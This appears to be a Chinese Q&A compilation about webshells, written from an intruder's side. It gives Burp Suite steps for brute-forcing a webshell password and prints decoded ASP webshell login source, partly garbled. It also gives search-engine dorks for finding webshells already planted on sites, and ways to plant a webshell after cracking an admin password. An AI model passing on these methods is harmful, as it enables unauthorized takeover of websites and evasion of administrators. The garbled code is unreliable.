本文目录一览:
- 1、如何使用Burpsuite破解Webshell密码
- 2、webshall 加密文件的破译
- 3、webshell是什么意思,有什么作用?
- 4、如果已经破解了网站管理后台的密码(ASP的),有哪些方法拿WEBSHELL
如何使用Burpsuite破解Webshell密码
方法如下:
0x01 先安装好火狐和hackbar插件。
0x02 配置好浏览器的代理并安装好burp。
0x03 在hackbar里面输入shell地址然后勾选post data。
在里面输入pas=phpinfo();burp开启拦截后点击execute按钮,(pas就是随便输入的密码)
0x04 这时候你会抓到一个数据包。
0x05 修改好变量,设置好字典就开始跑吧,跑完以后点击length排序下,数据包不一样的大小的就是正确密码了。
webshall 加密文件的破译
你好,是encode加密,你可以百度encode解密,有在线解密网站,我把解出来的贴出来吧
dim applicationname,pass,url,server-m,serverip,actio-,wwwroot,folderpath,fname,backurl,rw
server.scripttimeout=50000
on error resume -ext
application-ame = "hack's my webshell"
userpass = "1506079831362" '设置密码.
url = request.servervariables("url")
server-m = request.servervariables("server_name")
serverip = request.servervariables("local_addr")
actio- = request("action")
rootpath = server.mappath(".")
wwwroot = server.mappath("/")
folderpath = request("folderpath")
f-ame = request("fname")
backurl = "meta http-equiv='refresh' co-tent='2;url=?actio-=showfile'"
if request("pass")=userpass then sessio-("webadmi-")=userpass
if session("webadmin")userpass then
if request.form("pass")"" then
if request.form("pass")=userpass then
session("webadmi-")=userpass
response.redirect url
else
response.write"验证失败!"
end if
else
rw="center style='font-size:12px'brbrs.d asp webshell 2005"
rw=rw "form action='" url "' method='post'"
rw=rw "密码:input -ame='pass' type='password' size='15' style='font-size: 12px;border: menu 1px solid'"
rw=rw " input type='submit' value='登录' style='border-width: 1px'/form/ce-ter"
response.write rw
rw=""
end if
respo-se.e-d
e-d if
webshell是什么意思,有什么作用?
webshell是web入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。
为了更好理解webshell我们学习两个概念:
什么是“木马”?“木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。
什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
webshell的优点
webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。
如何寻找webshel:
1,脚本攻击SQL注入
2,使用注入工具
3,在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果
如果已经破解了网站管理后台的密码(ASP的),有哪些方法拿WEBSHELL
看看有没有数据库备份,利用备份ASP木马。
看看数据库是什么类型的,已便插入一句话木马。
再就是你说的抓包了,思路无非就是这些。
自己一点点实践吧。
